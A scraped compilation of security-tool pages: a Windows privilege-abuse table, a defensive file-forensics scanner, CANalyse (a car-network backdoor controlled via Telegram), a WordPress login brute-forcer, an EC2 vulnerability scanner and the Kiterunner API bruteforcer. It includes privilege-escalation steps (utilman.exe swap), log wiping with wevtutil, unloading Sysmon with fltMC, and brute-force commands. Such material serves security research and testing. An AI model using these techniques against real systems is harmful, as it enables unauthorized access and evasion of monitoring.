Alternatively, the privilege may be used to unload security-related drivers with the fltMC built-in command, i.e.: fltMC sysmondrv
Remarks: 1. The szkg64 vulnerability is listed as CVE-2018-15732. 2. The szkg64 exploit code was created by Parvez Anwar.

SeLockMemory (Availability, 3rd party tool)
Execution path: Starve the System memory partition by moving pages.
Remarks: PoC published by Walied Assar (@waleedassar).

SeMachineAccount (None)
Remarks: The privilege is not used in the Windows OS.

SeManageVolume (Admin, 3rd party tool)
Execution path:
1. Enable the privilege in the token
2. Create a handle to \\.\C: with SYNCHRONIZE | FILE_TRAVERSE
3. Send FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545
4. Overwrite utilman.exe etc.
Remarks: FSCTL_SD_GLOBAL_CHANGE can be made with this piece of code.

SeProfileSingleProcess (None)
Remarks: The privilege is checked before changing (and, in a very limited set of commands, before querying) parameters of Prefetch, SuperFetch, and ReadyBoost. The impact may be adjusted, as the real effect is not known.

SeRelabel (Threat, 3rd party tool)
Execution path: Modification of system files by a legitimate administrator?
Remarks: See the MIC documentation. Integrity labels are infrequently used and work only on top of standard ACLs. Two main scenarios include: protection against attacks using exploitable applications such as browsers, PDF readers etc., and protection of OS files. Attacks with SeRelabel must obey access rules defined by ACLs, which makes them significantly less useful in practice.

SeRemoteShutdown (Availability, built-in commands)
Execution path: shutdown /s /f /m \\server1 /d P:5:19
Remarks: The privilege is verified when a shutdown/restart request comes from the network. The 127.0.0.1 scenario is to be investigated.

SeReserveProcessor (None)
Remarks: It looks like the privilege is no longer used; it appeared only in a couple of versions of winnt.h. You can see it listed, e.g., in the source code published by Microsoft here.

SeRestore (Admin, PowerShell)
Execution path:
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege.
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
Remarks: The attack may be detected by some AV software. An alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.

SeSecurity (Threat, built-in commands)
Execution path:
- Clear the Security event log: wevtutil cl Security
- Shrink the Security log to 20MB so that events are flushed soon: wevtutil sl Security /ms:0
- Read the Security event log to gain knowledge about processes, access and actions of other users within the system.
- Knowing what is logged, act under the radar.
- Knowing what is logged, generate a large number of events, effectively purging old ones without leaving obvious evidence of cleaning.

SeShutdown (Availability, built-in commands)
Execution path: shutdown.exe /s /f /t 1
Remarks: Allows calling most of the NtPowerInformation() levels. To be investigated.

SeSyncAgent (None)
Remarks: The privilege is not used in the Windows OS.

SeSystemEnvironment (Unknown, 3rd party tool)
Execution path: The privilege permits the use of NtSetSystemEnvironmentValue, NtModifyDriverEntry and some other syscalls to manipulate UEFI variables.
Remarks: Firmware environment variables were commonly used on non-Intel platforms in the past, and are now slowly returning in the UEFI world. The area is highly undocumented. The potential may be huge (i.e. breaking Secure Boot), but raising the impact level requires at least a PoC.

SeSystemProfile: ???

SeSystemtime (Threat, built-in commands)
Execution path: cmd.exe /c date 01-01-01 and cmd.exe /c time 00:00
Remarks: The privilege allows changing the system time, potentially leading to audit trail integrity issues, as events will be stored with the wrong date/time. Be careful with date/time formats; use always-safe values if unsure. Sometimes the name of the privilege uses an uppercase "T" and is referred to as SeSystemTime.

SeTakeOwnership (Admin, built-in commands)
Execution path:
1. takeown.exe /f "%windir%\system32"
2. icacls.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
Remarks: The attack may be detected by some AV software. An alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.

SeTcb (Admin, 3rd party tool)
Execution path: Manipulate tokens to have local admin rights included.
Remarks: Sample code+exe creating arbitrary tokens can be found at PsBits.

SeTimeZone (Mess, built-in commands)
Execution path: Change the timezone: tzutil /s "Chatham Islands Standard Time"

SeTrustedCredManAccess: ???

SeUndock (None)
Remarks: The privilege is enabled when undocking, but has never been observed being checked to grant or deny access. In practice this means it is effectively unused and cannot lead to any escalation.

SeUnsolicitedInput (None)
Remarks: The privilege is not used in the Windows OS.

Credits:



Judge-Jury-and-Executable - A File System Forensics Analysis Scanner And Threat Hunting Tool


Features:
  • Scan a mounted filesystem for threats right away
  • Or gather a system baseline before an incident, for extra threat hunting ability
  • Can be used before, during or after an incident
  • For one to many workstations
  • Scans the MFT, bypassing file permissions, file locks or OS file protections/hiding/shadowing
  • Up to 51 different properties gathered for every file
  • Scan results go into an SQL table for later searching, aggregating results over many scans and/or many machines, and historical or retrospective analysis
  • Leverage the power of SQL to search file systems, query file properties, answer complex or high-level questions, and hunt for threats or indicators of compromise

Requirements:
  • .NET Framework v4.8
  • Local or remote SQL database with read/write/create access.
  • Visual studio (if you wish to compile the C# code)
  • Access to the internet (or else how did you get this code??? Also for nuget packages...)
  • Basic knowledge of SQL

Hunt for viruses, malware, and APTs on (multiple) file systems by writing queries in SQL.

Allow me to elaborate...

You start with a disk or disk images that are potentially dirty with malware, viruses, APTs (advanced persistent threats) or the like, and then scan them with this tool. (Optionally, and assuming you have the wisdom and foresight to do so, you may wish to scan a known good baseline disk image with this tool first (or later--doesn't matter). This is certainly not necessary, but can only serve to aid you.) The forensics-level scanning portion of this tool collects a bunch of properties about each file in a file system (or an image of one), and places these properties in a SQL relational database table. The secret sauce comes from being able to threat hunt, investigate, or ask questions about the data through the use of queries, in the language of SQL, against the database that is created. A key feature here was NOT inventing a proprietary query language. If you know SQL, and how to click a button, then you already know how to use this tool like a boss. Even if you don't, this concept is powerful enough that canned queries (see below) will get you a lot of mileage.


Forensics-level scanning.

Firstly, the tool creates an entry in the database for each record found in the MFT (master file table; it's how NTFS does its record keeping). This bypasses file security permissions, file hiding, stealth or obfuscation techniques, file deletion, or timestamp tampering. These techniques will not prevent the file from being scanned and catalogued. The bytes of the file are read from the MFT, and as many data points as possible are taken from those bytes before attempting to access any data points using the higher-level OS API calls.


Rich, high-level data analytics.

After the MFT and forensics-level data is secured, operating-system-level properties, data and meta-data available about each file is collected and augments each entry created from the MFT entry. As a result of this, even if the file or its properties from the Operating System API or the dotnet framework cannot be accessed due to file permissions (ACL), file locks (is in use), disk corruption, a zero-byte-length file, or any of the various other reasons, the file's existence will still be recorded, logged and tracked. The entry, however, will simply not contain the information about it that was not accessible to the operating system. Up to 51 different data points may be collected for every file.



For each file, information collected includes:
  • SHA256 hash
  • MD5 hash
  • Import table hash (if it exists)
  • MFT Number & Sequence Number
  • MFT Create/Modified/Accessed Dates
  • Create/Modified/Accessed Dates Reported by OS
  • All the 'Standard' OS file properties: location, size, datestamps, attributes, metadata
  • Is a PE or DLL or Driver?
  • Is Authenticode signed?
  • Does the X.509 certificate chain verify?
  • Custom YARA rules (Lists the rule names that match)
  • File entropy (see the sketch after this list)
  • Up to 51 different data points in total
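File entropy, for example, is the standard Shannon entropy over byte frequencies (values close to 8 bits/byte hint at packed or encrypted content); a self-contained sketch of the computation:

import math
from collections import Counter

def shannon_entropy(path, chunk_size=1 << 20):
    # Count byte frequencies without loading the whole file into memory.
    counts, total = Counter(), 0
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            counts.update(chunk)
            total += len(chunk)
    if total == 0:
        return 0.0
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

print(shannon_entropy(r"C:\Windows\System32\notepad.exe"))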

Canned Queries:
/*
IDEA: All files in the directory C:\Windows\System32\ should be 'owned' by TrustedInstaller.
If a file in the System32 directory is owned by a different user, this indicates an anomaly,
and that user is likely the user that created that file.
Malware likes to masquerade around as valid Windows system files.
Executables that are placed in the System32 directory not only look more official, as it is a common path for
system files, but an explicit path to that executable does not need to be supplied to execute it from the
command line, windows 'Run' dialog box of the start menu, or the win32 API call ShellExecute.
*/

SELECT
TOP 1000 *
FROM [FileProperties]
WHERE
[FileOwner] <> 'TrustedInstaller'
AND [DirectoryLocation] = ':\Windows\System32'
AND IsSigned = 0
ORDER BY [PrevalenceCount] DESC


/*
IDEA: The MFT creation timestamp and the OS creation timestamp should match.
If the MFT creation timestamp occurs after the creation time reported by the OS meta-data,
this indicates an anomaly.
Timestomp is a tool that is part of the Metasploit Framework that allows a user to backdate a file
to an arbitrary time of their choosing. There really isn't a good legitimate reason for doing this
(let me know if you can think of one), and is considered an anti-forensics technique.
*/

SELECT
TOP 1000 *
FROM [FileProperties]
WHERE
([MftTimeAccessed] <> [LastAccessTime]) OR
([MftTimeCreation] <> [CreationTime]) OR
([MftTimeMftModified] <> [LastWriteTime])
ORDER BY [DateSeen] DESC

/*
IDEA: The 'CompileDate' property of any executable or dll should always come before the creation timestamp for that file.
Similar logic applies as for the MFT creation timestamp occurring after the OS creation timestamp. How could a program have been
compiled AFTER the file that holds it was created? This anomaly indicates backdating or timestomping has occurred.
*/


SELECT
TOP 1000 *
FROM [FileProperties]
WHERE
([MftTimeCreation] < [CompileDate]) OR
([CreationTime] < [CompileDate])
ORDER BY [DateSeen] DESC



CANalyse - A Vehicle Network Analysis And Attack Tool


CANalyse is a tool built to analyse vehicle network log files, automatically find unique datasets, and connect to simple user interfaces such as Telegram. While using this tool, the attacker can provide a bot ID and use the tool over the internet through a Telegram bot. CANalyse is made to be placed inside a Raspberry Pi and can exploit the vehicle through a Telegram bot by recording and analysing the network traffic/data logs, like a hardware backdoor planted in a car.

A prerequisite to using this tool is that the hardware implant is already installed in the car and capable of communicating with the network/communication channels inside the vehicle.
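For context, CANalyse builds on python-can; reading raw frames from the implant's bus interface looks roughly like this (the socketcan channel name can0 is an assumption):

import can  # python-can, one of the libraries the tool builds on

# Print the arbitration ID and payload of every frame seen on the bus.
bus = can.interface.Bus(channel="can0", bustype="socketcan")
for msg in bus:
    print(hex(msg.arbitration_id), msg.data.hex())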


Explained here

Tool Layout


Requirements:

Installation of CANalyse:
git clone https://github.com/KartheekLade/CANalyse.git
cd CANalyse
pip3 install -r requirements.txt

Usage
cd CANalyse/
python3 canalyse_tool.py

Troubleshooting
  • If the tool dumps a "No such device" error or you can't view any traffic, check the interface & communication channel in the settings.
  • If the automatic installation of the required libraries didn't work, try running with sudo once, or install them manually.
  • If you are not able to execute commands properly, do check the "menu".

Next Updates (In process)
  • A secondary refinement process to get a more concentrated payload, which will be optional for users.
  • Making the settings common between the CLI and the bot.
  • The ability to record and download multiple files.

Note:
  • The code is constantly being updated to fix bugs, improve error handling and smooth the experience. If you face any problems, send a DM or raise an issue; we (I and the contributors) will be happy to help as much as we can.
  • Thanks to the developers who created python-can and the other libraries used in this tool.

Warning
  • This tool is purely for learning and educational purposes only. I and the contributors are not responsible for any harmful actions.
  • Don't use or share your public bot name/ID; it's advised to use a random name.


WordPress-Brute-Force - Super Fast Login WordPress Brute Force


WordPress Brute Force Super Fast Login

      .---.        .-----------
/ \ __ / ------
/ / \( )/ -----
////// ' \/ ` ---
//// / // : ★★ : ---
// / / /` '--
// //..\ WpCrack Brute Froce Tool™
====UU====UU==========================
'//||\`
''``
usage: python WpCrack.py [options]
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
-d, --debug debugging mode

target arguments:
-t , --target url of the target
-u , --username username of the target (default: admin)
-p , --password password of the target (change -p to --p to use a wordlist)

--timeout timed out for requests
--thread numbers of threading multiproccesor (default: 5)
--proxy using a HTTP proxy (ex: http://site.com:8000)

Copyright © 2021 Andrew - Powered by Indonesian Darknet

How To Use

Using a single password

python WpCrack.py -t http://site.com/wp-login.php -u admin -p password

Using a multiple password / wordlist

python WpCrack.py -t http://site.com/wp-login.php -u admin --p wordlist.txt

About

WpCrack is a tool used to brute-force logins to the WordPress CMS web application, and is built in the Python programming language


Features
  • Very fast login
  • Use of HTTP proxies
  • Multithreading or Multiprocessor


Red-Detector - Scan Your EC2 Instance To Find Its Vulnerabilities Using Vuls.io


Scan your EC2 instance to find its vulnerabilities using Vuls (https://vuls.io/en/).

Audit your EC2 instance to find security misconfigurations using Lynis (https://cisofy.com/solutions/#lynis).

Scan your EC2 instance for signs of a rootkit using Chkrootkit (http://www.chkrootkit.org/). 




Requirements
  1. Configured AWS account with the EC2 actions mentioned below. The policy containing these requirements can be found in red-detector-policy.json.

Actions details:

Required action permission: why it is required

  • "AttachVolume": Enables attaching the volume with the taken snapshot to the EC2 instance that is being used for the vulnerability scan.
  • "AuthorizeSecurityGroupIngress": Enables attaching a security group to the EC2 instance. Contains IP permissions for the SSH port and a random port generated for scan UI access.
  • "DescribeInstances": Enables access to the client's EC2 instance details.
  • "CreateKeyPair": Enables the creation of a key pair that is used as the key of the EC2 instance.
  • "CreateTags": Enables the creation of tags on the volume and snapshot.
  • "DescribeRegions": Enables access to the client's active regions so the user can select the relevant one for the scan.
  • "RunInstances": Enables the creation of an EC2 instance under the user's account.
  • "ReportInstanceStatus": Enables getting the current status of the created EC2 instance to make sure it is running.
  • "DescribeSnapshots": Enables getting the current status of the taken snapshot to make sure it is available.
  • "DescribeImages": Enables querying AMIs to get the latest Ubuntu AMI.
  • "DescribeVolumeStatus": Enables getting the current status of the volume being created.
  • "DescribeVolumes": Enables getting details about a volume.
  • "CreateVolume": Enables the creation of a volume, in order to attach the taken snapshot to it and attach it to the EC2 instance used for the vulnerability scan.
  • "DescribeAvailabilityZones": Enables access to the client's active availability zones to select one for the created volume that is attached to the EC2 instance.
  • "DescribeVpcs": Enables getting the client's default VPC. Used for generating the EC2 security group.
  • "CreateSecurityGroup": Enables the creation of a security group that is attached to the EC2 instance.
  • "CreateSnapshot": Enables taking a snapshot. Used to take a snapshot of the chosen EC2 instance.
  • "DeleteSnapshot": Enables deleting the stale snapshot that was created during the process.
  2. Running EC2 instance: make sure you know the region and instance ID of the EC2 instance you would like to scan. Supported versions:
    • Ubuntu: 14, 16, 18, 19, 20
    • Debian: 6, 8, 9
    • Redhat: 7, 8
    • Suse: 12
    • Amazon: 2
    • Oracle: 8

Installation
sudo git clone https://github.com/lightspin-tech/red-detector.git
pip3 install -r requirements.txt

Usage

Interactive
python3 main.py

Command arguments
usage: main.py [-h] [--region REGION] [--instance-id INSTANCE_ID] [--keypair KEYPAIR] [--log-level LOG_LEVEL]

optional arguments:
-h, --help show this help message and exit
--region REGION region name
--instance-id INSTANCE_ID EC2 instance id
--keypair KEYPAIR existing key pair name
--log-level LOG_LEVEL log level

Flow
  1. Run main.py.
  2. Region selection: use the default region (us-east-1) or select a region. Notice that if the selected region does not contain any EC2 instances, you will be asked to choose another region.
  3. EC2 instance-id selection: you will get a list of all EC2 instance IDs under your selected region and will be asked to choose the instance you would like to scan. Make sure to choose a valid answer (the number to the left of the desired ID).
  4. Track the process progress... It takes about 30 minutes.
  5. Get a link to your report!
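Under the hood, steps 2 and 3 correspond to the DescribeRegions/DescribeInstances permissions from the table above; the instance-listing step in boto3 looks roughly like this (the region value is the default from step 2):

import boto3  # assumes AWS credentials are configured as per the requirements

ec2 = boto3.client("ec2", region_name="us-east-1")
for reservation in ec2.describe_instances()["Reservations"]:
    for instance in reservation["Instances"]:
        print(instance["InstanceId"], instance["State"]["Name"])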

Troubleshooting

Verbose logging

python3 main.py --log-level DEBUG


Scanner database update process
  1. Connect to the created EC2 instance: ssh ubuntu@PUBLICIP -i KEYPAIR.pem
  2. Watch the progress: tail /var/log/user-data.log


Kiterunner - Contextual Content Discovery Tool


For the longest time, content discovery has been focused on finding files and folders. While this approach is effective for legacy web servers that host static files or respond with 3xx's upon a partial path, it is no longer effective for modern web applications, specifically APIs.

Over time, we have seen a lot of time invested in making content discovery tools faster so that larger wordlists can be used, however the art of content discovery has not been innovated upon.

Kiterunner is a tool that is capable of not only performing traditional content discovery at lightning fast speeds, but also bruteforcing routes/endpoints in modern applications.

Modern application frameworks such as Flask, Rails, Express, Django and others follow the paradigm of explicitly defining routes which expect certain HTTP methods, headers, parameters and values.

When using traditional content discovery tooling, such routes are often missed and cannot easily be discovered.

By collating a dataset of Swagger specifications and condensing it into our own schema, Kiterunner can use this dataset to bruteforce API endpoints by sending the correct HTTP method, headers, path, parameters and values for each request it sends.

Swagger files were collected from a number of data sources, including an internet-wide scan for the 40+ most common swagger paths. Other data sources included GitHub via BigQuery, and APIs.guru.


Installation

Downloading a release

You can download a pre-built copy from https://github.com/assetnote/kiterunner/releases.


Building from source
# build the binary
make build

# symlink your binary
ln -s $(pwd)/dist/kr /usr/local/bin/kr

# compile the wordlist
# kr kb compile <input.json> <output.kite>
kr kb compile routes.json routes.kite

# scan away
kr scan hosts.txt -w routes.kite -x 20 -j 100 --ignore-length=1053

The JSON datasets can be found below:

Alternatively, it is possible to download the compiled .kite files from the links below:


Usage

Quick Start
kr [scan|brute] <input> [flags]
  • <input> can be a file, a domain, or a URI; we'll figure it out for you. See Input/Host Formatting for more details
# Just have a list of hosts and no wordlist
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 --fail-status-codes 400,401,404,403,501,502,426,411

# You have your own wordlist but you want assetnote wordlists too
kr scan target.com -w routes.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,403,501,502,426,411

# Bruteforce like normal but with the first 20000 words
kr brute https://target.com/subapp/ -A=aspx-210328:20000 -x 20 -j 1

# Use a dirsearch style wordlist with %EXT%
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 -exml,asp,aspx,ashx -D

CLI Help
Usage:
kite scan [flags]

Flags:
-A, --assetnote-wordlist strings use the wordlists from wordlist.assetnote.io. specify the type/name to use, e.g. apiroutes-210228. You can specify an additional maxlength to use only the first N values in the wordlist, e.g. apiroutes-210228;20000 will only use the first 20000 lines in that wordlist
--blacklist-domain strings domains that are blacklisted for redirects. We will not follow redirects to these domains
--delay duration delay to place inbetween requests to a single host
--disable-precheck whether to skip host discovery
--fail-status-codes ints which status codes blacklist as fail. if this is set, this will override success-status-codes
--filter-api strings only scan apis matching this ksuid
--force-method string whether to ignore the methods specified in the ogl file and force this method
-H, --header strings headers to add to requests (default [x-forwarded-for: 127.0.0.1])
-h, --help help for scan
--ignore-length strings a range of content length bytes to ignore. you can have multiple. e.g. 100-105 or 1234 or 123,34-53. This is inclusive on both ends
--kitebuilder-full-scan perform a full scan without first performing a phase scan.
-w, --kitebuilder-list strings ogl wordlist to use for scanning
-x, --max-connection-per-host int max connections to a single host (default 3)
-j, --max-parallel-hosts int max number of concurrent hosts to scan at once (default 50)
--max-redirects int maximum number of redirects to follow (default 3)
-d, --preflight-depth int when performing preflight checks, what directory depth do we attempt to check. 0 means that only the docroot is checked (default 1)
--profile-name string name for profile output file
--progress show a progress bar while scanning. by default enabled only on Stderr (default true)
--quarantine-threshold int if the host returns N consecutive hits, we quarantine the host as wildcard. Set to 0 to disable (default 10)
--success-status-codes ints which status codes whitelist as success. this is the default mode
-t, --timeout duration timeout to use on all requests (default 3s)
--user-agent string user agent to use for requests (default "Chrome. Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36")
--wildcard-detection can be set to false to disable wildcard redirect detection (default true)

Global Flags:
--config string config file (default is $HOME/.kiterunner.yaml)
-o, --output string output format. can be json,text,pretty (default "pretty")
-q, --quiet quiet mode. will mute unnecessary pretty text
-v, --verbose string level of logging verbosity. can be error,info,debug,trace (default "info")

bruteforce flags (all the flags above +)

  -D, --dirsearch-compat              this will replace %EXT% with the extensions provided. backwards compat with dirsearch because shubs loves him some dirsearch
-e, --extensions strings extensions to append while scanning
-w, --wordlist strings normal wordlist to use for scanning

Input/Host Formatting

When supplied with an input, kiterunner will attempt to resolve the input in the following order:

  1. Is the input a file? If so, read all the lines in the file as separate domains
  2. The input is treated as a "domain"

If you supply a "domain" that also exists as a file (e.g. you pass google.com and a file named google.com exists in the current directory), we'll load the google.com text file, since we found it first.

Domain Parsing

It's preferred that you provide a full URI as the input; however, you can provide incomplete URIs and we'll try to guess what you mean. An example list of domains you can supply is:

one.com
two.com:80
three.com:443
four.com:9447
https://five.com:9090
http://six.com:80/api

The above list of domains will expand into the subsequent list of targets

(two targets are created for one.com, since neither port nor protocol was specified)
http://one.com (port 80 implied)
https://one.com (port 443 implied)

http://two.com (port 80 implied)
https://three.com (port 443 implied)
http://four.com:9447 (non-tls port guessed)
https://five.com:9090
http://six.com/api (port 80 implied; basepath API appended)

The rules we apply are:

  • if you supply a scheme, we use the scheme.
    • We only support http & https
    • if you don't supply a scheme, we'll guess based on the port
  • if you supply a port, we'll use the port
    • If your port is 443 or 8443, we'll assume it's TLS
    • if you don't supply a port, we'll guess both ports 80 and 443
  • if you supply a path, we'll prepend that path to all requests against that host

API Scanning

When you have a single target

# single target
kr scan https://target.com:8443/ -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34

# single target, but you want to try http and https
kr scan target.com -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34

# a list of targets
kr scan targets.txt -w routes.kite -A=apiroutes-210228:20000 -x 10 --ignore-length=34

Vanilla Bruteforcing
kr brute https://target.com -A=raft-large-words -A=apiroutes-210228:20000 -x 10 -d=0 --ignore-length=34 -ejson,txt

Dirsearch Bruteforcing

For when you have an old-school wordlist that still has %EXT% in it, you can use -D. This will only substitute the extension where %EXT% is present in the path.

kr brute https://target.com -w dirsearch.txt -x 10 -d=0 --ignore-length=34 -ejson,txt -D

Technical Features

Depth Scanning

A key feature of kiterunner is depth-based scanning. This attempts to handle detecting wildcards given virtual application path-based routing. The depth defines how many directories deep the baseline checks are performed, e.g.

~/kiterunner $ cat wordlist.txt

/api/v1/user/create
/api/v1/user/delete
/api/v2/user/
/api/v2/admin/
/secrets/v1/
/secrets/v2/
  • At depth 0, only / would have the baseline checks performed for wildcard detection
  • At depth 1, /api and /secrets would have baseline checks performed; and these checks would be used against /api and /secrets correspondingly
  • At depth 2, /api/v1, /api/v2, /secrets/v1 and /secrets/v2 would all have baseline checks performed.

By default, kr scan has a depth of 1, since from internal usage, we've often seen this as the most common depth where virtual routing has occurred. kr brute has a default depth of 0, as you typically don't want this check to be performed with a static wordlist.

Naturally, increasing the depth will increase the accuracy of your scans; however, it also increases the number of requests to the target (# of baseline checks * # of baseline directories at that depth). Hence, we recommend staying at depth 1, and only in rare cases going to depth 2.
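As a sketch, a deeper scan against the wordlist above might look like this (the -d/--preflight-depth flag is documented in the CLI help earlier):

# baseline wildcard checks performed down to /api/v1, /api/v2, /secrets/v1, /secrets/v2
kr scan hosts.txt -w routes.kite -d 2 -x 5 -j 100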


Using Assetnote Wordlists

We provide inbuilt downloading and caching of wordlists from assetnote.io. You can use these with the -A flag, which receives a comma-delimited list of aliases or full names.

You can get a full list of all the Assetnote wordlists with kr wordlist list.

When used, the wordlists are cached in ~/.cache/kiterunner/wordlists and compiled from .txt -> .kite.

+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+
| ALIAS | FILENAME | SOURCE | COUNT | FILESIZE | CACHED |
+-----------------------------------+-------------------------------------------------------+----------------+---------+----------+--------+
| 2m-subdomains | 2m-subdomains.txt | manual.json | 2167059 | 28.0mb | false |
| asp_lowercase | asp_lowercase.txt | manual.json | 24074 | 1.1mb | false |
| aspx_lowercase | aspx_lowercase.txt | manual.json | 80293 | 4.4mb | false |
| bak | bak.txt | manual.json | 31725 | 634.8kb | false |
| best-dns-wordlist | best-dns-wordlist.txt | manual.json | 9996122 | 139.0mb | false |
| cfm | cfm.txt | manual.json | 12100 | 260.3kb | true |
| do | do.txt | manual.json | 173152 | 4.8mb | false |
| dot_filenames | dot_filenames.txt | manual.json | 3191712 | 71.3mb | false |
| html | html.txt | manual.json | 4227526 | 107.7mb | false |
| apiroutes-201120 | httparchive_apiroutes_2020_11_20.txt | automated.json | 953011 | 45.3mb | false |
| apiroutes-210128 | httparchive_apiroutes_2021_01_28.txt | automated.json | 225456 | 6.6mb | false |
| apiroutes-210228 | httparchive_apiroutes_2021_02_28.txt | automated.json | 223544 | 6.5mb | true |
| apiroutes-210328 | httparchive_apiroutes_2021_03_28.txt | automated.json | 215114 | 6.3mb | false |
| aspx-201118 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt | automated.json | 63200 | 1.7mb | false |
| aspx-210128 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_01_28.txt | automated.json | 46286 | 928.7kb | false |
| aspx-210228 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_02_28.txt | automated.json | 43958 | 883.3kb | false |
| aspx-210328 | httparchive_aspx_asp_cfm_svc_ashx_asmx_2021_03_28.txt | automated.json | 45928 | 926.8kb | false |
| cgi-201118 | httparchive_cgi_pl_2020_11_18.txt | automated.json | 2637 | 44.0kb | false |

<SNIP>

Usage

kr scan targets.txt -A=apiroutes-210228 -x 10 --ignore-length=34
kr brute targets.txt -A=aspx-210228 -x 10 --ignore-length=34 -easp,aspx

Head Syntax

When using assetnote provided wordlists, you may not want to use the entire wordlist, so you can opt to use the first N lines in a given wordlist using the head syntax. The format is <wordlist_name>:<N lines> when specifying a wordlist.

Usage

# this will use the first 20000 lines in the api routes wordlist
kr scan targets.txt -A=apiroutes-210228:20000 -x 10 --ignore-length=34

# this will use the first 10 lines in the aspx wordlist
kr brute targets.txt -A=aspx-210228:10 -x 10 --ignore-length=34 -easp,aspx

Concurrency Settings/Going Fast

Kiterunner is made to go fast on a lot of hosts. But just because you can run kiterunner at 20000 goroutines doesn't mean it's a good idea. Bottlenecks and performance degradation will occur at high thread counts due to more time spent scheduling goroutines that are waiting on network IO and kernel context switching.

There are two main concurrency settings for kiterunner:

  • -x, --max-connection-per-host - maximum number of open connections we can have on a host. Governed by 1 goroutine each. To avoid DOS'ing a host, we recommend keeping this in a low realm of 5-10. Depending on latency to the target, this will yield on average between 1-5 requests per second per connection (200ms - 1000ms/req) to a host.
  • -j, --max-parallel-hosts - maximum number of hosts to scan at any given time. Governed by 1 supervisor goroutine each.

Depending on the hardware you are scanning from, the "maximum" number of goroutines you can run optimally will vary. On an AWS t3.medium, we saw performance degradation going over 2500 goroutines. Meaning, 500 hosts x 5 conn per host (2500) would yield peak performance.

We recommend against running kiterunner from your MacBook. Due to poor kernel optimisations for high IO counts and Epoll syscalls on macOS, we noticed substantially poorer (0.3-0.5x) performance when compared to running kiterunner on a similarly configured Linux instance.

To maximise performance when scanning an individual target, or a large attack surface we recommend the following tips:

  • Spin up an EC2 instance in a similar geographic region/datacenter to the target(s) you are scanning
  • Perform some initial benchmarks against your target set with varying -x and -j options. We recommend having a typical starting point of around -x 5 -j 100 and moving -j upwards as your CPU usage/network performance permits
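A benchmarking progression under those suggestions might look like the following (targets file illustrative):

# hold connections-per-host steady, raise parallel hosts while watching CPU/network usage
kr scan targets.txt -w routes.kite -x 5 -j 100
kr scan targets.txt -w routes.kite -x 5 -j 250
kr scan targets.txt -w routes.kite -x 5 -j 500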

Converting between file formats

Kiterunner will also let you convert between the schema JSON, a kite file and a standard txt wordlist.

Usage

The format is decided by the filetype extension supplied by the <input> and <output> fields. We support txt, json and kite.

kr kb convert wordlist.txt wordlist.kite
kr kb convert wordlist.kite wordlist.json
kr kb convert wordlist.kite wordlist.txt
❯ go run ./cmd/kiterunner kb convert -qh
convert an input file format into the specified output file format

this will determine the conversion based on the extensions of the input and the output
we support the following filetypes: txt, json, kite
You can convert any of the following into the corresponding types

-d Debug mode will attempt to convert the schema with error handling
-v=debug Debug verbosity will print out the errors for the schema

Usage:
kite kb convert <input> <output> [flags]

Flags:
-d, --debug debug the parsing
-h, --help help for convert

Global Flags:
--config string config file (default is $HOME/.kiterunner.yaml)
-o, --output string output format. can be json,text,pretty (default "pretty")
-q, --quiet quiet mode. will mute unnecessary pretty text
-v, --verbose string level of logging verbosity. can be error,info,debug,trace (default "info")

Replaying requests

When you receive a bunch of output from kiterunner, it may be difficult to immediately understand why a request is causing a specific response code/length. Kiterunner offers a method of rebuilding the request from the wordlists used, including all the header and body parameters.

  • You can replay a request by copy-pasting the full response output into the kb replay command.
  • You can specify a --proxy to forward your requests through, so you can modify/repeat/intercept the request using 3rd party tools if you wish
  • The golang net/http client will make a few additional changes to your request due to how the default golang client implements the spec (unfortunately).
❯ go run ./cmd/kiterunner kb replay -q --proxy=http://localhost:8080 -w routes.kite "POST    403 [    287,   10,   1] https://target.com/dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents 0cc39f76702ea287ec3e93f4b4710db9c8a86251"
11:25AM INF Raw reconstructed request
POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1
Content-Type: any


11:25AM INF Outbound request
POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1
Host: target.com
User-Agent: Go-http-client/1.1
Content-Length: 0
Content-Type: any
Accept-Encoding: gzip


11:25AM INF Response After Redirects
HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 45
Content-Type: application/json
Date: Wed, 07 Apr 2021 01:25:28 GMT
X-Amzn-Requestid: 7e6b2ea1-c662-4671-9eaa-e8cd31b463f2

User is not authorized to perform this action

Technical Implementation

Intermediate Data Type (PRoutes)

We use an intermediate representation of wordlists and kitebuilder json schemas in kiterunner. This is to allow us to dynamically generate the fields in the wordlist and reconstruct request bodies/headers and query parameters from a given spec.

The PRoute type is composed of Headers, Body, Query and Cookie parameters that are encoded in pkg/proute.Crumb. The Crumb type is an interface that is implemented on types such as UUIDs, Floats, Ints, Random Strings, etc.

When performing conversions to and from txt, json and kite files, all the conversions are first done to the proute.API intermediate type. Then the corresponding encoding is written out.


Kite File Format

